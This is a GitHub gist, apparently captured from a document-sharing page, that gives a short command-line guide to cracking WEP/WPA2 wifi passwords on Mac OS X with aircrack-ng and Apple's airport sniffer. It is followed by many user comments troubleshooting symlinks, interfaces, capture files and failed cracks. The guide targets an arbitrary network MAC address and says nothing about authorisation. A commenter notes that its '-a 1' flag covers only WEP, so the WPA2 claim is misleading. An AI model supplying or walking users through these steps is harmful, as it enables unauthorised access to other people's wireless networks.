Sie sind auf Seite 1von 5

Instantly share code, notes, and snippets.

victorreyesh / Aircrack Commands


Created Sep 12, 2013

Embed Download ZIP


<script src="https://gist.github.com/victorreyesh/653

Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX

Aircrack Commands

1 //Install Macports.
2 //Install aircrack-ng:
3 sudo port install aircrack-ng
4 //Install the latest Xcode, with the Command Line Tools.
5 //Create the following symlink:
6 sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
7 //Figure out which channel you need to sniff:
8 sudo airport -s
9
10 sudo airport en1 sniff [CHANNEL]
11 //New Terminal Window
12 aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]
13 // Notes: the cap_file will be located in the /tmp/airportSniff*.cap.

jQrgen commented Jan 12, 2017

Change symling to:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport
/usr/local/bin/airport
ref: http://stackoverflow.com/questions/33223457/mac-osx-el-capitan-airport-sym-link-not-permitted

rafahigueros commented Jan 27, 2017

will this actually work with WPA networks? "-a 1" specifies for WEP, and WAP cracking requires dictionaries (-w option)

qfq8wf77qwf8 commented Apr 2, 2017

What if you installed via brew?

jwsi commented Apr 17, 2017

brew install aircrack-ng

immysam commented Jun 28, 2017

i didn't got access after step 10 i.e. 11 ,12 and 13 are not applicable
help me pls my mac is showing aircrack-ng command not found after step 12 aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]

immysam commented Jun 28, 2017

help me pls anybody????

ldelcampof commented Jul 15, 2017


this commands help me @immysam

export PATH=$PATH:/opt/local/bin
export MANPATH=$MANPATH:/opt/local/share/man
export INFOPATH=$INFOPATH:/opt/local/share/info

mfd commented Jul 25, 2017

@immysam check your network interface


$ networksetup listallhardwareports

sonu628 commented Jul 30, 2017

I am getting this
`
Attack failed. Possible reasons:

* Out of luck: you must capture more IVs. Usually, 104-bit WEP
can be cracked with about 80.000 IVs, sometimes more.

* Try to raise the fudge factor (-f).

Please specify a dictionary (option -w).`

simplenotezy commented Oct 1, 2017

Running sudo airport en1 sniff 1 does not work. Simply displays the help message.

unix-root commented Oct 10, 2017

^ +1

Emixam23 commented Oct 17, 2017

Why does it display the commands? I'm not sure to understand

Emixam23 commented Oct 18, 2017

Guys maybe it's because de paramaters aren't correct?

Emixam23 commented Oct 18, 2017

So stupid, I found why it happens.

Based on [THIS LINK], it seems like en1 is the interface of Wireless only when you have an ethernet port. On my MacBook Pro, I don't, so
en0 is the only one I have !

sudo airport en0 sniff [CHANNEL]

Hopefully it helps !

Gaaal commented Oct 21, 2017

How do I add a dictionary? Is Jack the Ripper good enough?


cyberfunk commented Oct 21, 2017

Hello how do I sniff with airport and use aircrack-ng using an Alfa AWUS036AC USB 3.0 adapter on a MacBook Pro? When I type ifconfig
in Terminal my USB wifi adapter doesn't show up.

hanhmr commented Oct 30, 2017

Dear admin,

How to see CAP_FILE? I have try to understand noted: the cap_file will be located in the /tmp/airportSniff*.cap. but don't know how to see
them, pls help!

Thanks a lot

(aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]


// Notes: the cap_file will be located in the /tmp/airportSniff*.cap.

VhaTer commented Dec 3, 2017 • edited

-i got a macbook air and guess i ask my self same thing how to do kali stuff natively on macos why im here

perhaps you already find this


1- http://jason4zhu.blogspot.fr/2014/12/crack-wep-wifi-via-aircrack-ng-in-mac-osx.html
2- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html ( this article Link to your Notes Here ^^)

RahulDhiman93 commented Dec 14, 2017 • edited

symlink is not working


NO SUCH FILE OR DIRECTORY

psyycopatart commented Jan 7, 2018

It say : No valid WPA handshakes found.


What can i do ? :(

jpacora commented Jan 28, 2018

The command will be:

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

MrPeker commented Feb 1, 2018

airport command not found :/

chezis45 commented Feb 9, 2018 • edited

sudo su -
ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

Worked for me when I got airport command not found and operation not possible.

weltmoasta commented Feb 19, 2018

i cant find the Cap_File because i have no folder like tmp. can anyone help me pls?
char543 commented Feb 21, 2018

@weltmoasta navigate to /tmp in finder

char543 commented Feb 21, 2018

also make sure youre typing .cap and not .cap. (the extra dot is what threw me)

AramSemerjyan commented Mar 27, 2018 • edited

Mac has built in sniffer for getting handshakes, why airport is needed for that? Also I'm wondering is the aircrack mechanism based on
getting handshakes and after try to recover password from hccapx with hashcat?

iamsoorajsingh commented May 11, 2018

command not found

chovy commented Jul 21, 2018

what is the target mac address?

Eastkap commented Aug 12, 2018

mac address is the same as bssid @chovy

Tetsu51718 commented Oct 8, 2018

can"t find [CAP_FILE]


pls help

Tetsu51718 commented Oct 8, 2018

$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport


ln: /usr/local/bin/airport: File exists
$ aircrack-ng -1 -a 1 -b
-bash: aircrack-ng: command not found
$ brew install aircrack-ng
Warning: aircrack-ng 1.4 is already installed, it's just not linked
You can use brew link aircrack-ng to link this version.
$ brew link aircrack-ng
Linking /usr/local/Cellar/aircrack-ng/1.4...
Error: Could not symlink sbin/airbase-ng
/usr/local/sbin is not writable.

what should do,, pls

DamonOnYT commented Nov 18, 2018 • edited

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

says "ln: /usr/sbin/airport: Operation not permitted"


DamonOnYT commented Nov 18, 2018

quick google solved it

for anyone w/ the same issue the command is

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

mzychinav commented Nov 23, 2018

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the solution?

madmike121989 commented Dec 21, 2018

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the
solution? i'm having the same issue

fungmen commented Jan 9, 2019

more easy when i'm installing kali on macbook air, i can scan and crack the handshake more faster beside debugging the OSX ^_^!

mikediachenko commented Mar 23, 2019

MacOS Mojave 10.14.1 failed got the replay "Segmentations Fault 11" message when proceed "airport en0 sniff", anyone got the
solution?

The same stuff.

Das könnte Ihnen auch gefallen